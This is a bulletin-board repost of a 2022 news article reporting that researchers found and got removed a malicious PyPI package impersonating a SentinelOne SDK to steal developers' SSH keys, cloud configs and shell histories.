1. Forum
  2. tqwNet
  3. TQW_GENTECH

  • There's another malicious PyPl package - this one stealing data f

    From TechnologyDaily@1337:1/100 to All on Tue Dec 20 21:15:04 2022
    There's another malicious PyPl package - this one stealing data from developers

    Date:
    Tue, 20 Dec 2022 21:08:32 +0000

    Description:
    Threat actors tried abusing a legitimate cybersecurity firm to distribute an infostealing package.

    FULL STORY ======================================================================

    Criminals have been found impersonating a well-known cybersecurity firm in an attempt to steal data from software developers, researchers have found.

    Researchers from ReversingLabs recently discovered a malicious Python package on PyPI called SentinelOne. Named after a known cybersecurity company from
    the United States, the package pretends to be a legitimate SDK client
    allowing easy access to the SentinelOne API from within a separate project.

    However, the package also carries api.py files which hold the malicious code, and allow the threat actors to exfiltrate sensitive data from the developers to a third-party IP address (54.254.189.27). Going after auth tokens and API keys

    The data being stolen includes Bash and Zsh histories, SSH keys, .gitconfig files, hosts files, AWS configuration info, Kube configuration info, and others. As per the publication, these folders usually store auth tokens, secrets, and API keys, which would enable threat actors further access to target cloud services and server endpoints.

    The worst part is that the package does offer the functionality the
    developers expect. In reality, this is a hijacked package, meaning unsuspecting developers might end up using it and becoming victims in ignorance. The good news is that ReversingLabs confirmed the malicious intent of the package, and after reporting it to both SentinelOne and PyPI, had it removed from the repository. Read more

    These are the best endpoint protection tools right now


    Malicious PyPi packages turn Discord into password-stealing malware


    This random image is spreading a malicious PyPl package using GitHub

    In the days and weeks leading up to the removal, the malicious actors were quite active. The package was first uploaded to PyPI on December 11, and has been updated 20 times in less than 10 days.

    One of the issues that were fixed with an update was the inability to exfiltrate data from Linux systems, the researchers found.

    Its difficult to say if anyone fell for the scam, the researchers concluded, as there is no evidence the package got used in an actual attack. Still, all the published versions were downloaded more than 1,000 times. Check out the best firewalls around

    Via: BleepingComputer



    ======================================================================
    Link to news story: https://www.techradar.com/news/theres-another-malicious-pypl-package-this-one- stealing-data-from-developers


    --- Mystic BBS v1.12 A47 (Linux/64)
    * Origin: tqwNet Technology News (1337:1/100)